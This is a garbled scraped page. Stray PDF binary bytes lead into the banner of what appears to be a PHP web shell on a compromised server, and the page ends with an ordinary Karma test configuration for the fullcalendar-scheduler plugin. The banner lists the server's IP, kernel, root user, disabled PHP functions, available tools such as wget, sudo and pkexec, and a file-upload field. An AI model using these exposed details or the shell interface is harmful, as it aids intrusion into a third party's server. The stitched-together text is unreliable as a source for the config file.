%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/11584/cwd/html/ppaobm/vendor/bower-asset/fullcalendar-scheduler/ |
Upload File : |
module.exports = function(config) { config.set({ basePath: '', frameworks: [ 'jasmine' ], files: [ 'node_modules/moment/moment.js', 'node_modules/jquery/dist/jquery.js', 'node_modules/components-jqueryui/jquery-ui.js', 'node_modules/xhr-mock/dist/xhr-mock.js', 'node_modules/native-promise-only/lib/npo.src.js', 'node_modules/jasmine-jquery/lib/jasmine-jquery.js', 'node_modules/jasmine-fixture/dist/jasmine-fixture.js', 'node_modules/jquery-simulate/jquery.simulate.js', // files from main project 'fullcalendar/dist/core/main.+(js|css)', 'fullcalendar/dist/interaction/main.+(js|css)', 'fullcalendar/dist/daygrid/main.+(js|css)', 'fullcalendar/dist/timegrid/main.+(js|css)', 'fullcalendar/dist/list/main.+(js|css)', { pattern: 'fullcalendar/dist/*/*.map', included: false, nocache: true, watched: false }, // plugin files (ordering matters because of dependencies) 'dist/timeline/main.+(js|css)', 'dist/resource-common/main.+(js|css)', 'dist/resource-daygrid/main.+(js|css)', 'dist/resource-timegrid/main.+(js|css)', 'dist/resource-timeline/main.+(js|css)', { pattern: 'dist/*/*.map', included: false, nocache: true, watched: false }, 'tests/automated/base.css', { pattern: 'tests/automated/json/**', included: false, nocache: true, watched: false }, 'tmp/automated-tests.js', { pattern: 'tmp/automated-tests.js.map', included: false, nocache: true, watched: false } ], preprocessors: { '**/*.js': [ 'sourcemap' ] }, customLaunchers: { ChromeHeadless_custom: { base: 'ChromeHeadless', flags: [ '--no-sandbox', // needed for TravisCI: https://docs.travis-ci.com/user/chrome#Sandboxing '--window-size=1280,1696' // some tests only work with larger window (w?, h?) ] } }, reporters: [ 'dots' ] }) }